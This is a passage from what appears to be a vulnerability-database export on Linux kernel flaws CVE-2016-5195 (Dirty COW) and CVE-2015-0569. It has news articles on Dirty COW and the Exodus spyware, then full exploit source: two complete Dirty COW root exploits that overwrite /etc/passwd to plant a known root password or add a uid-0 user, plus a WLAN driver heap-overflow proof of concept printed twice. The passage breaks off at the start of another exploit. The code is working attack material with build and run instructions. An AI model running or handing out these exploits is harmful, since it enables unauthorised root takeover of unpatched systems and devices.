kernel, which is so broken that any application or malicious program can tamper with read-only root-owned executable files and setuid executables. \n\n\n> \"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings,\" reads the [website](<http://dirtycow.ninja/>) dedicated to Dirty COW. \n\n> \"An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\"\n\nThe Dirty COW vulnerability has been present in the Linux kernel since version 2.6.22 in 2007, and is also believed to be present in Android, which is powered by the Linux kernel. \n \n\n\n### Patch Your Linux-powered Systems Immediately\n\n \nAccording to the website, the Linux kernel has been patched, and major vendors such as [RedHat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) and [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>) have already rolled out fixes for their respective Linux distributions. \n \nOrganizations and individuals have been urged to install a patch for their Linux-powered systems, phones and gadgets as soon as possible and risk falling victim in order to kill off the Linux kernel-level security flaw affecting nearly every distro of the open-source OS. \n \nThe vulnerability was discovered by security researcher Phil Oester, who fund at least one in-the-wild attack exploiting this particular vulnerability. He found the exploit using an HTTP packet capture. \n\n\nThe vulnerability disclosure followed the tradition of branding high-profile security vulnerabilities like [Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>), [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>), [FREAK](<https://thehackernews.com/2015/03/freak-openssl-vulnerability.html>), and [GHOST](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>). \n \nThe Dirty COW website states: \n\n\n> \"It would have been fantastic to eschew this ridiculousness because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. So we created a website, an online shop, a Twitter account, and used a logo that a professional designer created.\"\n\nYou can find more technical details about the Dirty COW vulnerability and exploit on the bug's official [website](<http://dirtycow.ninja/>), [RedHat](<https://access.redhat.com/security/vulnerabilities/2706661>) site, and [GitHub](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>) page.\n", "modified": "2016-10-25T15:07:13", "published": "2016-10-20T23:02:00", "id": "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "href": "https://thehackernews.com/2016/10/linux-kernel-exploit.html", "type": "thn", "title": "Dirty COW \u2014 Critical Linux Kernel Flaw Being Exploited in the Wild", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-09T07:54:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://1.bp.blogspot.com/-FYiOvknu4vY/XKxF4mYpV2I/AAAAAAAAztw/qfugwyFZSvUfDpDrIn4JxRzNFmIunzEjwCLcBGAs/s728-e100/ios-malware-min.jpg>)\n\nCybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store. \n \nDubbed **Exodus**, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year. \n \nUnlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. \n\n\n \nSince Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. \n \n\n\n> \"Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,\" the researchers say in a [blog post](<https://blog.lookout.com/esurv-research>). \n \n\"All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.\"\n\n \nThough the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information. \n \nThe stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. \n\n\n[](<https://1.bp.blogspot.com/-bbiYR-lAE7Y/XKw-4K1NxFI/AAAAAAAAztY/7pLITJjk3Tg_hA18skRD3OG-OLKlQmsOwCLcBGAs/s728-e100/ios-malware-apple-enterprise-developer-program.png>)\n\n \nSeveral technical details indicated that Exodus was \"likely the product of a well-funded development effort\" and aimed to target the government or law-enforcement sectors. \n \n\n\n> \"These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,\" the researchers say.\n\n \nDeveloped by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders [discovered](<https://securitywithoutborders.org/blog/2019/03/29/exodus.html>) nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. \n \nUnder development for at least five years, Exodus for Android usually consists of three distinct stages. First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. \n\n\n \nThe second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. \n \nFinally, the third stage uses the infamous [DirtyCOW](<https://thehackernews.com/2017/09/dirty-cow-android-malware.html>) exploit ([CVE-2016-5195](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>)) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. \n \nThe Android variant is also designed to keep running on the infected device even when the screen is switched off. \n \nWhile the Android version of Exodus had potentially infected \"several hundreds if not a thousand or more\" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. \n \nAfter being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. \n \nThis is the second instance in the past year when an Italian software company has been caught distributing spyware. Earlier last year, another undisclosed Italian firm was found distributing \"**Skygofree**,\" a [dangerous Android spying tool](<https://thehackernews.com/2018/01/android-spying-malware.html>) that gives hackers full control of infected devices remotely.\n", "modified": "2019-04-09T07:19:48", "published": "2019-04-09T07:19:00", "id": "THN:6681D64EFC53E13356AF1184CE1D6024", "href": "https://thehackernews.com/2019/04/exodus-ios-malware.html", "type": "thn", "title": "'Exodus' Surveillance Malware Found Targeting Apple iOS Users", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T09:53:37", "description": "Linux Kernel - prima WLAN Driver Heap Overflow. CVE-2015-0569. Dos exploit for linux platform", "published": "2016-01-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - prima WLAN Driver Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "id": "EDB-ID:39308", "href": "https://www.exploit-db.com/exploits/39308/", "sourceData": "/*\r\n * Coder: Shawn the R0ck, [citypw@gmail.com]\r\n * Co-worker: Pray3r, [pray3r.z@gmail.com]\r\n * Compile:\r\n * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \r\n * # ./a.out wlan0\r\n * Boom......shit happens[ as always];-)\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <linux/wireless.h>\r\n#include <errno.h>\r\n\r\ntypedef unsigned char v_U8_t;\r\n#define HDD_MAX_CMP_PER_PACKET_FILTER 5\r\n\r\nstruct PacketFilterParamsCfg {\r\n\tv_U8_t protocolLayer;\r\n\tv_U8_t cmpFlag;\r\n\tv_U8_t dataOffset;\r\n\tv_U8_t dataLength;\r\n\tv_U8_t compareData[8];\r\n\tv_U8_t dataMask[8];\r\n};\r\n\r\ntypedef struct {\r\n\tv_U8_t filterAction;\r\n\tv_U8_t filterId;\r\n\tv_U8_t numParams;\r\n\tstruct PacketFilterParamsCfg\r\n\t paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];\r\n} tPacketFilterCfg, *tpPacketFilterCfg;\r\n\r\nint main(int argc, const char *argv[])\r\n{\r\n\tif (argc != 2) {\r\n\t\tfprintf(stderr, \"Bad usage\\n\");\r\n\t\tfprintf(stderr, \"Usage: %s ifname\\n\", argv[0]);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tstruct iwreq req;\r\n\tstrcpy(req.ifr_ifrn.ifrn_name, argv[1]);\r\n\tint fd, status, i = 0;\r\n\tfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n\ttPacketFilterCfg p_req;\r\n\r\n\t/* crafting a data structure to triggering the code path */\r\n\treq.u.data.pointer =\r\n\t malloc(sizeof(v_U8_t) * 3 +\r\n\t\t sizeof(struct PacketFilterParamsCfg) * 5);\r\n\tp_req.filterAction = 1;\r\n\tp_req.filterId = 0;\r\n\tp_req.numParams = 3;\r\n\tfor (; i < 5; i++) {\r\n\t\tp_req.paramsData[i].dataLength = 241;\r\n\t\tmemset(&p_req.paramsData[i].compareData, 0x41, 16);\r\n\t}\r\n\r\n\tmemcpy(req.u.data.pointer, &p_req,\r\n\t sizeof(v_U8_t) * 3 +\r\n\t sizeof(struct PacketFilterParamsCfg) * 5);\r\n\r\n\tif (ioctl(fd, 0x8bf7, &req) == -1) {\r\n\t\tfprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\",\r\n\t\t\targv[1], strerror(errno));\r\n\t} else {\r\n\t\tprintf(\"You shouldn't see this msg...\\n\");\r\n\t}\r\n\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39308/"}, {"lastseen": "2016-11-29T17:23:22", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-27T00:00:00", "id": "EDB-ID:40847", "href": "https://www.exploit-db.com/exploits/40847/", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n\r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n\r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n\r\nusing namespace std;\r\n\r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n\r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n\r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n\r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n\r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n\r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n\r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n\r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n\r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n\r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n\r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n\r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n\r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n\r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n\r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n\r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n\r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n\r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n\r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n\r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40847/"}, {"lastseen": "2016-11-28T21:23:40", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation. CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-28T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "EDB-ID:40839", "href": "https://www.exploit-db.com/exploits/40839/", "sourceData": "//\r\n// This exploit uses the pokemon exploit as a base and automatically\r\n// generates a new passwd line. The original /etc/passwd is then\r\n// backed up to /tmp/passwd.bak and overwritten with the new line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// Original exploit:\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// To use this exploit modify the user values according to your needs\r\n//\r\n// Compile with\r\n//\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// and just run the newly create binary with ./dirty\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n\r\n\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n\r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n\r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n\r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n\r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n\r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n\r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n\r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n\r\n char ch;\r\n FILE *source, *target;\r\n\r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n\r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n\r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n\r\n fclose(source);\r\n fclose(target);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n\r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n\r\n char *plaintext_pw = getpass(\"Please enter new password: \");\r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n\r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n\r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40839/"}], "zdt": [{"lastseen": "2018-01-02T17:10:04", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2016-01-25T00:00:00", "title": "Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "href": "https://0day.today/exploit/description/25771", "id": "1337DAY-ID-25771", "sourceData": "/*\r\n * Coder: Shawn the R0ck, [[email\u00a0protected]]\r\n * Co-worker: Pray3r, [[email\u00a0protected]]\r\n * Compile:\r\n * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \r\n * # ./a.out wlan0\r\n * Boom......shit happens[ as always];-)\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <linux/wireless.h>\r\n#include <errno.h>\r\n \r\ntypedef unsigned char v_U8_t;\r\n#define HDD_MAX_CMP_PER_PACKET_FILTER 5\r\n \r\nstruct PacketFilterParamsCfg {\r\n v_U8_t protocolLayer;\r\n v_U8_t cmpFlag;\r\n v_U8_t dataOffset;\r\n v_U8_t dataLength;\r\n v_U8_t compareData[8];\r\n v_U8_t dataMask[8];\r\n};\r\n \r\ntypedef struct {\r\n v_U8_t filterAction;\r\n v_U8_t filterId;\r\n v_U8_t numParams;\r\n struct PacketFilterParamsCfg\r\n paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];\r\n} tPacketFilterCfg, *tpPacketFilterCfg;\r\n \r\nint main(int argc, const char *argv[])\r\n{\r\n if (argc != 2) {\r\n fprintf(stderr, \"Bad usage\\n\");\r\n fprintf(stderr, \"Usage: %s ifname\\n\", argv[0]);\r\n return -1;\r\n }\r\n \r\n struct iwreq req;\r\n strcpy(req.ifr_ifrn.ifrn_name, argv[1]);\r\n int fd, status, i = 0;\r\n fd = socket(AF_INET, SOCK_DGRAM, 0);\r\n tPacketFilterCfg p_req;\r\n \r\n /* crafting a data structure to triggering the code path */\r\n req.u.data.pointer =\r\n malloc(sizeof(v_U8_t) * 3 +\r\n sizeof(struct PacketFilterParamsCfg) * 5);\r\n p_req.filterAction = 1;\r\n p_req.filterId = 0;\r\n p_req.numParams = 3;\r\n for (; i < 5; i++) {\r\n p_req.paramsData[i].dataLength = 241;\r\n memset(&p_req.paramsData[i].compareData, 0x41, 16);\r\n }\r\n \r\n memcpy(req.u.data.pointer, &p_req,\r\n sizeof(v_U8_t) * 3 +\r\n sizeof(struct PacketFilterParamsCfg) * 5);\r\n \r\n if (ioctl(fd, 0x8bf7, &req) == -1) {\r\n fprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\",\r\n argv[1], strerror(errno));\r\n } else {\r\n printf(\"You shouldn't see this msg...\\n\");\r\n }\r\n \r\n}\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25771"}, {"lastseen": "2018-01-09T19:17:02", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Linux Kernel Race Condition Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25944", "id": "1337DAY-ID-25944", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat 